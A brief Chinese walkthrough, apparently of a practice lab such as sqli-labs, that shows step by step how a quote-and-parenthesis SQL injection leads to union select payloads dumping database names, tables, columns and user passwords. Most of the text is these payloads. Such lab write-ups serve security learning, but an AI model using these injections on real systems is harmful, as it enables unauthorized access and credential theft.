老规矩,输入id=1
输入id=1’
查看错误提示
查看源码,猜测可能要在1‘后面加)
查询列表数,发现为3 ?id=1') order by 3--+
发现列表为3,接下来就是常规操作了,首先使用联合查询?id=-1') union select 1,2,3--+
接下来查询数据库名字?id=-1') union select 1,2,database()--+
然后查询表?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables--+;
然后查询列名:?id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
最后爆用户和密码
?id=-1') union select 1,2, group_concat(concat_ws('~',username,password)) from security.users--+;
总结:输入id=1,id=1' 然后我们查询列表数,查询数据库名字,查表,查列,最后得到用户和密码